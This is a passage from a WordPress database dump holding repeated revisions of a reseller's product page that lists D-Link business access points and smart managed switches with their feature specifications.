802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:11:45','2019-09-25 07:11:45','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3422,1,'2019-09-25 15:13:17','2019-09-25 07:13:17','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:13:17','2019-09-25 07:13:17','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3426,1,'2019-09-25 15:30:50','2019-09-25 07:30:50','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" 